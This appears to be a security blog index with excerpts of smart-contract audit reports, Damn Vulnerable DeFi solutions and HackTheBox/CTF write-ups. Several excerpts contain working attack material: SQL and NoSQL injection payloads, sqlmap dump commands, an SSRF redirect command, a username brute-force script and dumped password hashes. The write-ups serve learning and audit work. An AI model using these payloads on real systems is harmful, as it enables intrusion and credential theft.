emacab98

The short version I took part in the OneShot audit contest on Codehawks and reported a High-rated vulnerability. The issue lies in the lack of access control on the NFTs used to battle: it is possible for any user to send someone else's NFT to battle. This can represent an unfair advantage, if an attacker decides to use an NFT stronger than the one they own to have better chances of winning the battle. Here is the full report I submitted to the judges of this contest, along with a PoC to exploi...

The short version I took part in the OneShot audit contest on Codehawks and reported two High-severity vulnerabilities regarding a game-theory flaw in their matchmaking process. However, the judge did not agree, calling the protocol implementation a "design decision" instead of a vulnerability. In the litigation period, I submitted my thoughts concerning how this design decision would actually cause the protocol to come to a full halt, given enough time, but my concerns were disregarded saying ...

The contest I took part in the OneShot audit contest on Codehawks and obtained a High-severity vulnerability regarding the use of randomness on-chain, a typical, difficult-to-solve issue that affects many protocols. Using randomness in an environment where everything is deterministic and publicly known is not that easy, unfortunately. When implemented poorly, the use of weak randomness can completely compromise the purpose of a protocol, as was the case here. The short version The protocol f...

I participated in the "The Standard" audit contest on Codehawks, and identified a High-severity vulnerability. The issue is related to the usage of a loop over an unbounded data structure, which can cause different users to incur very different gas costs: so much so, that a late user might have to face gas costs so high to effectively discourage him to take part in the protocol AT ALL. Of course, no protocol wants to draw users away simply through poor coding practices, so the vulnerability was...

Introduction I thought I had a high. I participated in the Voting Booth bug bounty and reported a high-rated vulnerability. But it was rejected. Because I did not read a key piece of information that rendered all my thought process completely useless. Let's see what it was. Let us reopen the imaginary wound. The source code You can find the source code on my other blog post, the triumphant one about the bug that was, indeed, approved and validated. It is here, if you are interested. What fol...

The Contest Just before Christmas, the team at Codehawks created a bug bounty challenge to mimic one bug they encountered during one of their assessments. The challenge was to identify the same bug they reported during a real audit and report it as in a bug bounty program. The code base, shown right here, was simplified for the sake of clarity: // SPDX-License-Identifier: MIT pragma solidity ^0.8.23; import {Math} from "@openzeppelin/contracts/utils/math/Math.sol"; // @title VotingBooth // @a...

The Audit In one of our most recent security reviews at Inference, we run into an interesting situation, which is discussed in this blog post. The premise is that of a smart contract with a simple access control mechanism: In order to change a storage variable, you have to be in possession of at least N out of M passwords This is a gigantic simplification of the original situation, however, it will help to discuss the interesting bug without getting lost in unnecessary details. The Smart C...

The Tincho Exercise While taking a look at Cyfrin Updraft, more on that in a later post, potentially, instructor Patrick Collins highly suggests to take onto a small challenge: a fuzz test exercise proposed by Tincho. You can find the repo of the challenge here. While Tincho already suggests his own solution right underneath the exercise, I thought to write this to go through my thought process developing the test, as it turned out to be structurally different, and equally effective, as Tincho...

The contract The developers of the previous pool seem to have learned the lesson. And released a new version! Now they’re using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough. You start with 20 ETH and 10000 DVT tokens in balance. The pool has a million DVT tokens in balance. You know what to do. The only contract associated with the challenge is the following one: contract PuppetV2Pool { using SafeMath for uint256; addre...

The contract There’s a lending pool where users can borrow Damn Valuable Tokens (DVTs). To do so, they first need to deposit twice the borrow amount in ETH as collateral. The pool currently has 100000 DVTs in liquidity. There’s a DVT market opened in an old Uniswap v1 exchange, currently with 10 ETH and 10 DVT in liquidity. Pass the challenge by taking all tokens from the lending pool. You start with 25 ETH and 1000 DVTs in balance. contract PuppetPool is ReentrancyGuard { using Address f...

The contract Starting with just 0.1 ETH in balance, pass the challenge by obtaining all ETH available in the exchange. We also receive two very long strings as part of the challenge: 4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35 4d 48 67 79 4d 44 67 79 4e 44 4a 6a 4e 44 42 68...

The contract A new cool lending pool has launched! It’s now offering flash loans of DVT tokens. It even includes a fancy governance mechanism to control it. What could go wrong, right ? You start with no DVT tokens in balance, and the pool has 1.5 million. Your goal is to take them all. The challenge has an interface which you shouldn't care too much about. The other contracts are more interesting, here are the key points about each of them. First, the contract offering the flash loan funct...

The contract There’s a pool offering rewards in tokens every 5 days for those who deposit their DVT tokens into it. Alice, Bob, Charlie and David have already deposited some DVT tokens, and have won their rewards! You don’t have any DVT tokens. But in the upcoming round, you must claim most rewards for yourself. By the way, rumours say a new pool has just launched. Isn’t it offering flash loans of DVT tokens? This time there are multiple contracts. Two of them are just the contracts that rep...

The contract The goal is to drain a pool that offers flash loans. The issue lies in the usage of an interface without any restriction on the msg.sender, that can implement that interface and perform any action. The solution The interesting part of the challenge contract is this function: function flashLoan(uint256 amount) external { uint256 balanceBefore = address(this).balance; IFlashLoanEtherReceiver(msg.sender).execute{value: amount}(); if (address(this).balance &...

The contract There is a pool containing 1 million DVT. The task is to drain it starting from nothing. The solution The contract is extremely short, here it is: // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/utils/Address.sol"; import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; import "../DamnValuableToken.sol"; /** * @title TrusterLenderPool * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) */ contract TrusterLenderPool ...

The contract The contract emulates a flash loan functionality. The challenge is to steal 10 ETH from the "receiver" user, while using the address whose alias is "player". The solution Each time a user requests a flash loan, they have to pay 1 ETH as a fee. In order to steal 10 ETH from a user, we can request 10 flash loans from their account. This is possible because the "flashLoan" functionality has no access control, so anyone can request flash loans for any other user by specifying their a...

The contract The goal is to stop the flash loan functionality. The vault has a function called "flashLoan" that will revert in four different scenarios. Among these, the one that we can control that will make the function fail for all users is the third one, that checks whether "totalSupply" is different than "balanceBefore". if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); "totalSupply" represents the number of existing tokens: if we analyze ERC20.sol, we can see i...

Target's IP: 10.10.11.167PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpHostname revealed: carpediem.htbThrough subdomain enumeration, we can find a new domain name as well: portal.carpediem.htbThere is a request subject to SQL injection:GET /?p=bikes&c=c4ca4238a0b923820dcc509a6f75849b'%2b(selectfrom(select(sleep(20)))a)%2b'Automating with SQLmap, we can dump the entire database, including the admin's hash:1,uploads/1635793020HONDAXADV.png,Male,<blank>,jhammond@carpediem.htb,Hamm...

Target's IP: 10.10.11.176Hostname: health.htbThe functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQLinjection vulnerability we can exploit:python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/...

Target's IP: 10.10.11.186PORT   STATE SERVICE21/tcp open  ftp22/tcp open  ssh80/tcp open  httpUnknown host: metapress.htbProudly powered by WordPress. Let's enumerate using wpscan.[i] Plugin(s) Identified:                                                                                                                                                                                                                                                                                                 [+] bo...

import string#from secret import MSG#ct = encryption(MSG)f = open('./msg.enc','r')text = bytes.fromhex(f.readline())result = ""alphabet = string.printablefor char in text:    for letter in alphabet:        if((123 * ord(letter) + 18 ) % 256 == char):            result += letterprint(result) ...

Challenge's address: 139.59.189.189:32670Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also calls the destruct magic method, which will help us in our exploitation.The method includes files, so it will allow us to read, we have a LFI on our hands. Fi...

Target's IP: 10.10.11.183PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http3000/tcp open  ppp3306/tcp open  mysqlGrafana on 3000 subject to unauthorized arbitrary file read, as per https://www.exploit-db.com/exploits/50581 Reading passwd, consul and grafana and developer are users on the boxGoogling for common configuration files, we can read /etc/grafana/grafana.ini# Either "mysql", "postgres" or "sqlite3", it's your choice;type = sqlite3;host = 127.0.0.1:3306;name = grafana;user = roo...

To exploit the wildcard SQL injection, this script helps us to identify the username:import requestsimport stringalphabet = string.digits + string.asciilowercase + string.asciiuppercase + string.punctuationword = ''while(True):    for letter in alphabet:        x = requests.post('http://165.22.122.58:31348/login', data = {'username': word + letter + '', 'password': ''})        if x.url == 'http://165.22.122.58:31348/':            word = word + letter            print(word)With a slight modificat...

Target's IP: 10.10.11.172PORT    STATE SERVICE22/tcp  open  ssh80/tcp  open  http443/tcp open  httpsRoot page / redirects to: http://shared.htbSubdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.customcart cookie is injectable, the answer when requesting the page on the checkout ...

Target's IP: 10.10.11.177PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpConnecting to the website leaks a domain name, siteisup.htbRecursive brute forcing of directories reveals the following two ones:/dev/dev.gitDownloading the .git is easy thanks to directory indexing, just run wget -r http://siteisup.htb/dev/.gitAnalyzing the git repo, there is an interesting commit we must checkout:commit 8812785e31c879261050e72e20f298ae8c43b565Author: Abdou.Y <84577967+ab2pentest@users.noreply.gith...

Target's IP: 10.10.11.169PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httphttp-title: Did not follow redirect to http://faculty.htbJavascript on login page suggests that if you intercept response and change 3 to 1 you can bypass logincblake@faculty.htbejames@faculty.htbjsmith@faculty.htbsqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dumpAdministrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | adminGenerating PDFs as an authenticated user, you can see that the tool used to ...

Target's IP: 10.10.11.180PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http9093/tcp open  copycatThe login suffers from NoSQL injection, we can bypass the login stage withusername=admin'||'1==1//&password=aaasa Again, injecting the  user search and downloading the export:username "admin"password "23c6877d9e2b564ef8b32c3a23de27b2" username "josh"password "6ebcea65320589ca4f2f1ce039975995"These look like md5 hashes, trying hashcat to crack them:6ebcea65320589ca4f2f1ce039...

Target's IP: 10.10.11.182PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpTrying to connect to the web server reveals an important information:Unknown host: photobomb.htbConnecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a Javascript file that contains sensitive information:function init() {  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me  if (document.cookie.match(/...

Target IP: 10.10.11.174 nmap -sS -p- -T4 --min-rate=10000 10.10.11.174 Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST Nmap scan report for 10.10.11.174 Host is up (0.11s latency). Not shown: 65516 filtered tcp ports (no-response) PORT      STATE SERVICE 53/tcp    open  domain 88/tcp    open  kerberos-sec 135/tcp   open  msrpc 139/tcp   open  netbios-ssn 389/tcp   open  ldap 445/tcp   open  microsoft-ds 464/tcp   open  kpasswd5 593/tcp   open  http-rpc-epmap 636/tcp   open  ldap...